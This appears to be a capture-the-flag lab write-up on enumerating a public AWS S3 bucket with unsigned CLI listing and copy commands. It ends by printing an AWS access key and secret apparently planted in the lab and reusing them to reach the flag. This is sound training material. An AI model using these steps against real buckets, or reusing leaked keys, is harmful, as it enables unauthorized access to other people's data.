S3 - Enum Basics - PwnedLabs
For example we have a website that is fetching resources from an S3 bucket. In the view source we spot the following:
In AWS we have the following type of buckets:
1. Amazon S3 Buckets (Object Storage)
General-Purpose Buckets – For storing any kind of object (files, images, logs, backups, etc.).
Static Website Hosting Buckets – Configured to serve a website directly from S3.
Logging Buckets – Used for storing access logs from CloudTrail, ALB, or S3 itself.
Data Lake Buckets – Used for storing large-scale data for analytics (e.g., AWS Lake Formation).
Backup Buckets – Used to store backups from AWS Backup or other services.
Machine Learning Data Buckets – For training ML models with AWS SageMaker.From the AWS documentation here, we observe the following:
Every object in a bucket has a URL that can be used to access it. As Amazon states: "Every object is contained in a bucket. For example, if the object named
photos/puppy.jpgis stored in theamzn-s3-demo-bucketbucket in the US West (Oregon) Region, then it is addressable by using the URLhttps://amzn-s3-demo-bucket.s3.us-west-2.amazonaws.com/photos/puppy.jpg"In our source code above, we have "https://s3.amazonaws.com/dev.huge-logistics.com/static/style.css" which means name of the bucket is dev.huge-logistics.com. Although it is not in the format stated above. GPT explains this: 1️⃣ Virtual-Hosted Style URL (Modern Default)
Most AWS documentation now suggests using the virtual-hosted style URL format, where the bucket name appears as a subdomain:
https://<bucket-name>.s3.<region>.amazonaws.com/<object-path>For example, if the bucket is amzn-s3-demo-bucket in us-west-2, an object called
photos/puppy.jpgwould be accessed at:https://amzn-s3-demo-bucket.s3.us-west-2.amazonaws.com/photos/puppy.jpgThis is now the default method for accessing objects in newer AWS regions. 2️⃣ Path-Style URL (Older Format, Used in Some Cases)
The URL you provided follows the older path-style access method:
https://s3.amazonaws.com/<bucket-name>/<object-path>Your example:
https://s3.amazonaws.com/dev.huge-logistics.com/static/style.cssHere:
s3.amazonaws.comis the base S3 endpoint.dev.huge-logistics.comis the bucket name./static/style.cssis the object path.
AWS allowed this format for a long time, but in 2019, AWS announced that path-style URLs are being deprecated for new buckets in most regions. However, older buckets or buckets in legacy regions (like us-east-1) still support it.
Okay so we can enumerate it.
Any command help in AWS is generally in the format:
aws <module> <additional API call (if any)> help
So, aws s3 help would tell that you can run "ls" to enumerate
aws s3 ls s3://dev.huge-logistics.com/admin --no-sign-request
The following command would do a recursive "ls." If it can't access anything it would throw an error.
aws s3 ls s3://dev.huge-logistics.com/admin --no-sign-request --recursive
Similarly one can look in a specific folder by appending the folder name in the URL
aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
aws s3 ls s3://dev.huge-logistics.com/static/ --no-sign-request
However, we don't have access to admin and migration-files right now. We can copy the hl_migration_project.zip to current folder like so:
aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request
We see access keys in one of the files. This is a bad practice.
We can configure these credentials using "aws configure" command and access other folders
But I couldn't access these. So I accessed other folder
It had this line:
<CredentialEntry>
<ServiceType>AWS IT Admin</ServiceType>
<AccountID>794929857501</AccountID>
<AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
<SecretAccessKey>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</SecretAccessKey>
<Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
</CredentialEntry>
^ I configured the compromised access keys and accessed the flag that way.
Last updated
Was this helpful?